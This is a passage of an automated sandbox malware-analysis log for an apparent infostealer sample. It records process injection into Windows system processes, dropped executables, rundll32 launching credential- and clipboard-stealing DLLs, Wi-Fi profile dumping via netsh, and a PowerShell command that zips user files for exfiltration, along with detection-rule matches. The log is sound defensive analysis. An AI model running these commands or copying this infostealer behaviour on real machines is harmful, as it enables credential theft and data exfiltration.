                          Source: mggoBrtk9t.exe, 00000000.00000000.1321742841.00007FF7CDC48000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs mggoBrtk9t.exe
                          Source: mggoBrtk9t.exe, 00000000.00000003.1322805683.00000000007B0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs mggoBrtk9t.exe
                          Source: mggoBrtk9t.exe, 00000000.00000003.1322765972.0000000000760000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameServices.exe2 vs mggoBrtk9t.exe
                          Source: 5.2.explorer.exe.c5b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.2.explorer.exe.aff0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.0.explorer.exe.aff0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 2.2.svchost.exe.21c7ec7d000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.2.explorer.exe.bf9b350.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.0.explorer.exe.aff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 2.2.svchost.exe.21c7ec7d000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.2.explorer.exe.bf9b350.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.2.explorer.exe.aff0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.2.explorer.exe.c5b0000.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 5.3.explorer.exe.bf9b350.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 00000005.00000000.1347856091.000000000AFF0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 00000005.00000002.3924900127.000000000C5B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 00000002.00000002.3800744010.0000021C7EC7D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: 00000005.00000002.3861811657.000000000AFF0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                          Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@59/84@0/2
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeCode function: 11_2_00007FF7102C29E0 GetLastError,FormatMessageW,MessageBoxW,11_2_00007FF7102C29E0
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC44264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,0_2_00007FF7CDC44264
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC440E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,0_2_00007FF7CDC440E4
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEA40E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,2_2_00007FF68DEA40E4
                          Source: C:\Windows\System32\svchost.exeCode function: 2_2_00007FF68DEA4264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,2_2_00007FF68DEA4264
                          Source: C:\Windows\explorer.exeCode function: 5_2_0C5B3270 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,5_2_0C5B3270
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF673524264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,6_2_00007FF673524264
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeCode function: 6_2_00007FF6735240E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,6_2_00007FF6735240E4
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB54264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,8_2_00007FF6FDB54264
                          Source: C:\Windows\System32\audiodg.exeCode function: 8_2_00007FF6FDB540E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,8_2_00007FF6FDB540E4
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B524264 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetTokenInformation,CloseHandle,AdjustTokenPrivileges,CloseHandle,9_2_00007FF63B524264
                          Source: C:\Windows\System32\msiexec.exeCode function: 9_2_00007FF63B5240E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,CloseHandle,OpenProcess,WaitForSingleObject,CloseHandle,9_2_00007FF63B5240E4
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeCode function: 0_2_00007FF7CDC44004 CreateToolhelp32Snapshot,Process32FirstW,wcscmp,Process32NextW,CloseHandle,0_2_00007FF7CDC44004
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeFile created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193Jump to behavior
                          Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\worker_RdDwvE
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_03
                          Source: C:\Windows\System32\audiodg.exeMutant created: \Sessions\1\BaseNamedObjects\worker_kBEqZh
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3240:120:WilError_03
                          Source: C:\Windows\System32\msiexec.exeMutant created: \Sessions\1\BaseNamedObjects\worker_BAccdq
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\43266f2abbf198987ad62d4962cf7134
                          Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\GqgWzd
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1180:120:WilError_03
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\56C7.tmpJump to behavior
                          Source: mggoBrtk9t.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: 6148.tmp.ssg.exe, 00000011.00000002.1764205289.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.000000000302C000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, 6148.tmp.ssg.exe, 00000011.00000002.1764205289.0000000003042000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.3469272832.0000022206438000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001C.00000002.3004550203.00000247D3368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: mggoBrtk9t.exeReversingLabs: Detection: 55%
                          Source: 759D.tmp.gfx.exeString found in binary or memory: " /add /y
                          Source: 759D.tmp.gfx.exeString found in binary or memory: " /add
                          Source: Gxtuum.exeString found in binary or memory: " /add
                          Source: Gxtuum.exeString found in binary or memory: " /add /y
                          Source: Gxtuum.exeString found in binary or memory: " /add
                          Source: Gxtuum.exeString found in binary or memory: " /add /y
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeFile read: C:\Users\user\Desktop\mggoBrtk9t.exeJump to behavior
                          Source: unknownProcess created: C:\Users\user\Desktop\mggoBrtk9t.exe "C:\Users\user\Desktop\mggoBrtk9t.exe"
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe"
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe"
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                          Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\netsh.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe" Jump to behavior
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe" Jump to behavior
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe "C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exe" Jump to behavior
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe "C:\Users\user\AppData\Local\Temp\6148.tmp.ssg.exe" Jump to behavior
                          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe "C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exeProcess created: C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\56C7.tmp.ctx.exe" Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\759D.tmp.gfx.exeProcess created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\mggoBrtk9t.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Roaming\A629855EB2A22925382193\A629855EB2A22925382193.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\System32\audiodg.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
